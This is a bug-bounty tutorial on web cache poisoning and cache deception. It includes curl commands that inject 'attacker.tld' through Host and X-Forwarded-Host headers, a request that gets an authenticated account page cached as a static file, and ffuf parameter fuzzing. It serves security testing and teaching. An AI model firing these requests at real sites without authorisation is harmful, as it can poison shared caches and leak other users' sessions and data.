Caching bugs are silent assassins. You won’t see them in OSCP, but on bug bounty targets they can be the key to cross-tenant leaks, session hijacking, or straight account takeover. In this guide, we’ll weaponize simple requests — Host headers, extra parameters, caching directives — to turn the server’s own speed tricks against it.
Understanding Web Caching
Most modern stacks sit behind caching layers:
CDNs (Cloudflare, Akamai, Fastly)
Reverse proxies (Varnish, Squid, nginx with proxy_cache)
Load balancers with cache modules
Caching is meant to save resources by storing copies of responses. The danger: if a cache can be poisoned or tricked, every subsequent user sees your payload.
Cache Poisoning Attacks
Cache poisoning = inserting malicious input into a cached response.
Classic example: host header abuse.
# Poison host header
curl -H "Host: attacker.tld" https://victim.com/ -v
If the cache stores this and serves it to others, you’ve poisoned the page.
With Burp’s Param Miner extension, you can hunt for headers or params that affect the cache key (but aren’t sanitized). Examples: X-Forwarded-Host, X-Forwarded-Scheme, X-Original-URL.
Cache Deception Attacks
Cache deception = tricking the cache into storing private data by appending extensions.
# Force cache to store authenticated page
curl https://target.com/account.php/style.css -b session=VALID
The app still serves account data, but the cache thinks it’s a static file. Now /account.php/style.css is public for anyone.
Practical Examples
Cache Key Confusion
Two URLs resolve the same content, but only one respects authentication. Cache one, serve both.
# Normal request (auth required)
curl -b auth=valid https://victim.com/profile
# Poison with extra param
curl -b auth=valid https://victim.com/profile?x=1
Header-based Poisoning
curl -H "X-Forwarded-Host: attacker.tld" https://victim.com/ -v
Watch if it gets cached and replayed to other visitors.
Method Override Poisoning
curl -X POST -H "X-HTTP-Method-Override: GET" https://victim.com/
If the cache sees GET but the app processes POST, you’ve split reality.
Tools in Play
Burp Suite + Param Miner: brute force for unkeyed headers/params.
ffuf: param discovery.
ffuf -w /usr/share/seclists/Discovery/Web-Parameter/test-params.txt:FUZZ \
-u https://target.tld/page?FUZZ=1 -fc 404
curl: raw probes for headers and edge cases.
Real Bug Bounty Context
Caching bugs scale: you poison once, thousands of users get hit. High impact = high payout.
Cache poisoning → XSS payload spreads like a worm.
Cache deception → sensitive data leak without auth.
Cache key confusion → cross-tenant data access.
Command Recap
# Host header injection
curl -H "Host: attacker.tld" https://victim.com/
# Cache deception trick
curl https://victim.com/account.php/style.css -b session=VALID
# Param miner / fuzzing
ffuf -w test-params.txt:FUZZ -u https://target.tld/page?FUZZ=1 -fc 404
Final Thoughts
Web caches are supposed to protect servers, not attackers. But when they trust headers or file extensions blindly, you can rewrite reality for every user downstream. One poisoned request can become a global exploit.